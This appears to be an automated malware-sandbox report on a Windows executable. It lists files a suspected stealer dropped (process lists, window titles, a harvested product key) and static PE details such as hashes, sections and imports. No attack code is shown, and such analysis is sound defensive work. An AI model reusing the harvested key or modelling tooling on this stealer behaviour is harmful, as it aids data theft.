                                                                                                                                                                                                                                                          SHA1:1946D39D1590DD5AA2142848ED2F8A31793164FB
                                                                                                                                                                                                                                                          SHA-256:E62C32D1A6CED47C849BCBC0C54F1E875386C8413A82E6C1F9BA08FC84B4FC0F
                                                                                                                                                                                                                                                          SHA-512:A442D86755FE53CEB7DAEF55866A09E844085B23AB589A95329ED8AFE8394E185832480581B27F6CE71A250F71695EEDC18E217F5A15F378C6B3624D5EC832A0
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:NAME: svchost..PID: 2152..EXE: C:\Windows\system32\svchost.exe..NAME: explorer..PID: 2580..EXE: C:\Windows\Explorer.EXE..NAME: pelgCDCmFjscjZVAWzP..PID: 2148..EXE: C:\Program Files (x86)\YxEDqklxHIkNZCSFarchTywbjSUSfYiiFzTTqtEfnXrRj\pelgCDCmFjscjZVAWzP.exe..NAME: pelgCDCmFjscjZVAWzP..PID: 6884..EXE: C:\Program Files (x86)\YxEDqklxHIkNZCSFarchTywbjSUSfYiiFzTTqtEfnXrRj\pelgCDCmFjscjZVAWzP.exe..NAME: fontdrvhost..PID: 784..EXE: C:\Windows\system32\fontdrvhost.exe..NAME: svchost..PID: 4296..EXE: C:\Windows\system32\svchost.exe..NAME: pelgCDCmFjscjZVAWzP..PID: 3864..EXE: C:\Program Files (x86)\YxEDqklxHIkNZCSFarchTywbjSUSfYiiFzTTqtEfnXrRj\pelgCDCmFjscjZVAWzP.exe..NAME: smartscreen..PID: 5584..EXE: C:\Windows\System32\smartscreen.exe..NAME: svchost..PID: 1176..EXE: C:\Windows\system32\svchost.exe..NAME: svchost..PID: 2564..EXE: ..NAME: csrss..PID: 408..EXE: ..NAME: svchost..PID: 1724..EXE: C:\Windows\System32\svchost.exe..NAME: winlogon..PID: 552..EXE: C:\Windows\system32\winlogon.exe..NAME:

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\System\ProductKey.txt

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):31
                                                                                                                                                                                                                                                          Entropy (8bit):3.882606602358693
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:TrYaJG8n:YaJG8
                                                                                                                                                                                                                                                          MD5:D1E22CCE22ADCABAE7A13D05660C427E
                                                                                                                                                                                                                                                          SHA1:17D273C95200FCD9B823104663467182F9034F27
                                                                                                                                                                                                                                                          SHA-256:E1FD987F24B5205B8FC59EC5D7925332F6EBEB6E0AD72229F67D8F6420D97919
                                                                                                                                                                                                                                                          SHA-512:2A4D07E12302B076885E1A07B3B646B5B96D94C1F881AE808695E1B8ACA9939C09945C0BDF9F54BE3D26704FFBDBA2DCD32A349E11BB00880DD8CE297AC64B81
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:DPJN2-QF4WB-WCMWJ-VVRMW-4WG3C-Y

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\System\Windows.txt

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):15673
                                                                                                                                                                                                                                                          Entropy (8bit):5.607162459982602
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:AOn4QNPFiy5be64x+xyzFMZafHB5HBXH2+oZYeZxHXbAdFe+Ra3O8deVhAjEN7qu:Lx5HyzqEdbzRZh
                                                                                                                                                                                                                                                          MD5:852FA560A944F492A58BF68D328D6095
                                                                                                                                                                                                                                                          SHA1:A536B5B0CE4C2970B9FE51713824A79B6D4C90E8
                                                                                                                                                                                                                                                          SHA-256:7838B9E51997819CD7F8AA92507E05F571EC09D7B47E2DC9A266D191F0EC22A9
                                                                                                                                                                                                                                                          SHA-512:7B7F5DCFF7B5E43F102A0B7A7E72816DAFA54C72BAEBE72E55CE1A3D61594667332647B998F653F9366B7068EC36804360414B0A2C1F8156BB36BC3DF1221F81
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:NAME: pelgCDCmFjscjZVAWzP..TITLE: New Tab - Google Chrome..PID: 2148..EXE: C:\Program Files (x86)\YxEDqklxHIkNZCSFarchTywbjSUSfYiiFzTTqtEfnXrRj\pelgCDCmFjscjZVAWzP.exe..NAME: pelgCDCmFjscjZVAWzP..TITLE: New Tab - Google Chrome..PID: 6884..EXE: C:\Program Files (x86)\YxEDqklxHIkNZCSFarchTywbjSUSfYiiFzTTqtEfnXrRj\pelgCDCmFjscjZVAWzP.exe..NAME: pelgCDCmFjscjZVAWzP..TITLE: New Tab - Google Chrome..PID: 3864..EXE: C:\Program Files (x86)\YxEDqklxHIkNZCSFarchTywbjSUSfYiiFzTTqtEfnXrRj\pelgCDCmFjscjZVAWzP.exe..NAME: pelgCDCmFjscjZVAWzP..TITLE: New Tab - Google Chrome..PID: 6860..EXE: C:\Program Files (x86)\YxEDqklxHIkNZCSFarchTywbjSUSfYiiFzTTqtEfnXrRj\pelgCDCmFjscjZVAWzP.exe..NAME: pelgCDCmFjscjZVAWzP..TITLE: New Tab - Google Chrome..PID: 6428..EXE: C:\Program Files (x86)\YxEDqklxHIkNZCSFarchTywbjSUSfYiiFzTTqtEfnXrRj\pelgCDCmFjscjZVAWzP.exe..NAME: pelgCDCmFjscjZVAWzP..TITLE: New Tab - Google Chrome..PID: 3448..EXE: C:\Program Files (x86)\YxEDqklxHIkNZCSFarchTywbjSUSfYiiFzTTqtEfnXrRj\pelgCDCmFjs

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\msgid.dat

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4
                                                                                                                                                                                                                                                          Entropy (8bit):2.0
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Pm:e
                                                                                                                                                                                                                                                          MD5:C0826819636026DD1F3674774F06C51D
                                                                                                                                                                                                                                                          SHA1:1E768A21723E530122240FA219BFF8C3365F40B2
                                                                                                                                                                                                                                                          SHA-256:01B23136EA7F9F8B9E72C9E125FD710301BAEC28662B0DE2168967838C79E81A
                                                                                                                                                                                                                                                          SHA-512:8AF15968CE7287442204A26F411FF8C3AA6F43167D39A2719DF5C4540B3174D41A6C8063DB82EB49433805CD52F5BC1388BBD032C2C35260E05868C1BBA68E27
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:1392

                                                                                                                                                                                                                                                          \Device\Null

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\timeout.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):55
                                                                                                                                                                                                                                                          Entropy (8bit):4.5991860770036785
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:hYF8AgARcWmFsFJQZaVy:hYF/mFSQZas
                                                                                                                                                                                                                                                          MD5:471500D11DAF370CB75C597A4B1A7654
                                                                                                                                                                                                                                                          SHA1:1AC2D4BDA1A30E09287F680C2AD75C577B096898
                                                                                                                                                                                                                                                          SHA-256:C751BAFF37E4DC361F2C77BCC6B356159CC6178D1642244CBCD764A8DDE409B9
                                                                                                                                                                                                                                                          SHA-512:DB81C5CE33D78E5618F41738129B5E623300CEFF188D99E7173E4E524107EEDED4C3BE2F15AC4715D3D10EAC23E39841978BBD42326E5C4E016A2B938C37A855
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:..Waiting for 2 seconds, press CTRL+C to quit ....1.0..

                                                                                                                                                                                                                                                          Static File Info

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Entropy (8bit):7.874676406425068
                                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                          File name:LKxcbzlwkz.exe
                                                                                                                                                                                                                                                          File size:5'015'009 bytes
                                                                                                                                                                                                                                                          MD5:8959a4884f81ac4db0967b534dae9617
                                                                                                                                                                                                                                                          SHA1:e4cc4e745820910b4f427b6c2385a43c87b7ce3b
                                                                                                                                                                                                                                                          SHA256:02c5585c0346b9f7632691c41bb5741b8ab7b0f785e707ae65e918633bb5b801
                                                                                                                                                                                                                                                          SHA512:7602456939b36157ce957e267d9ca90f0017c50a3662473a44e5032e65b8d13b27d272e12dd5d380468eb4e5ba6d0c23e4280ecb23e1c51ea915768758d0ab1b
                                                                                                                                                                                                                                                          SSDEEP:98304:dtrbTA19yskZYOgVSKe1blpY02UrjooqqjHIFIeoEzkShdF6uehA8np:fc19ysyw6pY02UAoq8HIWeo6kC03dp
                                                                                                                                                                                                                                                          TLSH:0B36122AA64BD420C17177B55EB7F3BA2A3BF422172BDED397C41D7649B81812A07313
                                                                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..

                                                                                                                                                                                                                                                          File Icon

                                                                                                                                                                                                                                                          Icon Hash:1679587870ac996f

                                                                                                                                                                                                                                                          Static PE Info

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Entrypoint:0x4165c1
                                                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                                                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                          Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                                                          OS Version Major:5
                                                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                                                          File Version Major:5
                                                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                                                          Subsystem Version Major:5
                                                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                                                          Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378

                                                                                                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                                                          call 00007EFCE0B56DBBh
                                                                                                                                                                                                                                                          jmp 00007EFCE0B4DC2Eh
                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                                                                                                          push edi
                                                                                                                                                                                                                                                          push esi
                                                                                                                                                                                                                                                          mov esi, dword ptr [ebp+0Ch]
                                                                                                                                                                                                                                                          mov ecx, dword ptr [ebp+10h]
                                                                                                                                                                                                                                                          mov edi, dword ptr [ebp+08h]
                                                                                                                                                                                                                                                          mov eax, ecx
                                                                                                                                                                                                                                                          mov edx, ecx
                                                                                                                                                                                                                                                          add eax, esi
                                                                                                                                                                                                                                                          cmp edi, esi
                                                                                                                                                                                                                                                          jbe 00007EFCE0B4DDAAh
                                                                                                                                                                                                                                                          cmp edi, eax
                                                                                                                                                                                                                                                          jc 00007EFCE0B4DF46h
                                                                                                                                                                                                                                                          cmp ecx, 00000080h
                                                                                                                                                                                                                                                          jc 00007EFCE0B4DDBEh
                                                                                                                                                                                                                                                          cmp dword ptr [004A9724h], 00000000h
                                                                                                                                                                                                                                                          je 00007EFCE0B4DDB5h
                                                                                                                                                                                                                                                          push edi
                                                                                                                                                                                                                                                          push esi
                                                                                                                                                                                                                                                          and edi, 0Fh
                                                                                                                                                                                                                                                          and esi, 0Fh
                                                                                                                                                                                                                                                          cmp edi, esi
                                                                                                                                                                                                                                                          pop esi
                                                                                                                                                                                                                                                          pop edi
                                                                                                                                                                                                                                                          jne 00007EFCE0B4DDA7h
                                                                                                                                                                                                                                                          jmp 00007EFCE0B4E182h
                                                                                                                                                                                                                                                          test edi, 00000003h
                                                                                                                                                                                                                                                          jne 00007EFCE0B4DDB6h
                                                                                                                                                                                                                                                          shr ecx, 02h
                                                                                                                                                                                                                                                          and edx, 03h
                                                                                                                                                                                                                                                          cmp ecx, 08h
                                                                                                                                                                                                                                                          jc 00007EFCE0B4DDCBh
                                                                                                                                                                                                                                                          rep movsd
                                                                                                                                                                                                                                                          jmp dword ptr [00416740h+edx*4]
                                                                                                                                                                                                                                                          mov eax, edi
                                                                                                                                                                                                                                                          mov edx, 00000003h
                                                                                                                                                                                                                                                          sub ecx, 04h
                                                                                                                                                                                                                                                          jc 00007EFCE0B4DDAEh
                                                                                                                                                                                                                                                          and eax, 03h
                                                                                                                                                                                                                                                          add ecx, eax
                                                                                                                                                                                                                                                          jmp dword ptr [00416654h+eax*4]
                                                                                                                                                                                                                                                          jmp dword ptr [00416750h+ecx*4]
                                                                                                                                                                                                                                                          nop
                                                                                                                                                                                                                                                          jmp dword ptr [004166D4h+ecx*4]
                                                                                                                                                                                                                                                          nop
                                                                                                                                                                                                                                                          inc cx
                                                                                                                                                                                                                                                          add byte ptr [eax-4BFFBE9Ah], dl
                                                                                                                                                                                                                                                          inc cx
                                                                                                                                                                                                                                                          add byte ptr [ebx], ah
                                                                                                                                                                                                                                                          ror dword ptr [edx-75F877FAh], 1
                                                                                                                                                                                                                                                          inc esi
                                                                                                                                                                                                                                                          add dword ptr [eax+468A0147h], ecx
                                                                                                                                                                                                                                                          add al, cl
                                                                                                                                                                                                                                                          jmp 00007EFCE2FC65A7h
                                                                                                                                                                                                                                                          add esi, 03h
                                                                                                                                                                                                                                                          add edi, 03h
                                                                                                                                                                                                                                                          cmp ecx, 08h
                                                                                                                                                                                                                                                          jc 00007EFCE0B4DD6Eh
                                                                                                                                                                                                                                                          rep movsd
                                                                                                                                                                                                                                                          jmp dword ptr [00000000h+edx*4]

                                                                                                                                                                                                                                                          Rich Headers

                                                                                                                                                                                                                                                          Programming Language:
                                                                                                                                                                                                                                                          • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                          • [C++] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                          • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                          • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                          • [ASM] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                          • [RES] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                          • [LNK] VS2010 SP1 build 40219

                                                                                                                                                                                                                                                          Data Directories

                                                                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x4a858.rsrc
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                          Sections

                                                                                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                          .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                          .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                          .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                          .rsrc0xab0000x4a8580x4aa009d6f3e9a0d4624317cf92d8067628f1dFalse0.14213973513400335data5.124345458773063IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                          Resources

                                                                                                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                          RT_ICON0xab5680x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                                                                                                                                                          RT_ICON0xab6900x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                                                                                                                                                          RT_ICON0xab7b80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                                                                                                                                                          RT_ICON0xab8e00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                                                                                                                                                                                          RT_ICON0xac7880x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.3546931407942238
                                                                                                                                                                                                                                                          RT_ICON0xad0300x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.40173410404624277
                                                                                                                                                                                                                                                          RT_ICON0xad5980x42028Device independent bitmap graphic, 256 x 512 x 32, image size 0EnglishGreat Britain0.12139391070213333
                                                                                                                                                                                                                                                          RT_ICON0xef5c00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.31441908713692945
                                                                                                                                                                                                                                                          RT_ICON0xf1b680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.4202626641651032
                                                                                                                                                                                                                                                          RT_ICON0xf2c100x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.62677304964539
                                                                                                                                                                                                                                                          RT_MENU0xf30780x50dataEnglishGreat Britain0.9
                                                                                                                                                                                                                                                          RT_DIALOG0xf30c80xfcdataEnglishGreat Britain0.6507936507936508
                                                                                                                                                                                                                                                          RT_STRING0xf31c80x530dataEnglishGreat Britain0.33960843373493976
                                                                                                                                                                                                                                                          RT_STRING0xf36f80x690dataEnglishGreat Britain0.26964285714285713
                                                                                                                                                                                                                                                          RT_STRING0xf3d880x4d0dataEnglishGreat Britain0.36363636363636365
                                                                                                                                                                                                                                                          RT_STRING0xf42580x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                                                                                                                                                          RT_STRING0xf48580x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                                                                                                                                                          RT_STRING0xf4eb80x388dataEnglishGreat Britain0.377212389380531
                                                                                                                                                                                                                                                          RT_STRING0xf52400x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                                                                                                                                                                                                          RT_GROUP_ICON0xf53980x68dataEnglishGreat Britain0.6923076923076923
                                                                                                                                                                                                                                                          RT_GROUP_ICON0xf54000x14dataEnglishGreat Britain1.15
                                                                                                                                                                                                                                                          RT_GROUP_ICON0xf54180x14dataEnglishGreat Britain1.25
                                                                                                                                                                                                                                                          RT_GROUP_ICON0xf54300x14dataEnglishGreat Britain1.25
                                                                                                                                                                                                                                                          RT_VERSION0xf54480x19cdataEnglishGreat Britain0.5339805825242718
                                                                                                                                                                                                                                                          RT_MANIFEST0xf55e80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                                                                                                                                                                                                                                          Imports

                                                                                                                                                                                                                                                          DLLImport
                                                                                                                                                                                                                                                          WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                                                                                                                                                                                                          VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                                                                                                                                                                                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                                                                                                                                                          COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                                                                                                                                                                                                          MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                                                                                                                                                                                                          WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                                                                                                                                                                                                          PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                                                                                                                                                                                                          USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                                                                                                                                                                                                          KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                                                                                                                                                                                                                                          USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
